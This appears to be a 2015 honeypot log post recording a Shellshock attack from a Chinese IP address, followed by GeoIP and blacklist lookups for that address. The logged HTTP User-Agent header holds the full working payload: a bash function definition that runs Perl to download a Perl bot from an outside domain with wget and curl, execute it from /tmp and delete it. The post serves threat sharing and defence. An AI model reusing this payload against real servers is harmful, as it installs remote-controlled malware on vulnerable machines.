Samstag, 24. Oktober 2015

221.3.153.172 - Backdoor Perl Shelbot vi http://xn--80ahdkbnppbheq0fsb7br0a.xn--j1amh

BEGIN OF HTTP DATA:
2015-10-23 06:47:24
Source IP: 221.3.153.172
Country: CN RiskScore: 1 Malware: []
GET HTTP/1.1 HTTP/1.1
Accept: */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: () { :;};/usr/bin/perl -e 'print "Content-Type: text/plain\r\n\r\nXSUCCESS!";system("wget http://xn--80ahdkbnppbheq0fsb7br0a.xn--j1amh/vira.txt -O /tmp/vira.txt;curl -O /tmp/vira.txt http://xn--80ahdkbnppbheq0fsb7br0a.xn--j1amh/vira.txt;perl /tmp/vira.txt ; rm -rf vira.*");'
Host: 109.234.106.8
Connection: Close

221.3.153[.]172

    Static Source: GeoIP data
  • Country: China
  • ASN: AS4837 CNCGROUP China169 Backbone
    Dynamic Source: SANS Internet Storm Cast
  • comment:IP is listed on SANS ISC
  • comment:This entry alone does not indicate a threat, please check the link
  • Reference: https://isc.sans.edu/api/ip/221.3.153.172
    Static Source: panwdbl.appspot.com
  • Comment: Listed in open blacklist
  • Reference: https://panwdbl.appspot.com/lists/openbl.txt
    Static Source: http://sendmespamids.blogspot.nl/ Blacklist
  • Comment: Listed on Honeypot blacklist
  • Reference: https://raw.githubusercontent.com/johestephan/smsids-blacklist/master/blacklist.txt

Feed search for 221.3.153[.]172

    Source: Local Feed Database
  • Title: 221.3.153.172 - perl trojan via shellshock - cc 69.89.2.153
  • Reference: http://sendmespamids.blogspot.com/2015/10/2213153172-perl-trojan-via-shellshock.html
  • In db since: 2015-10-21 13:01:19.504158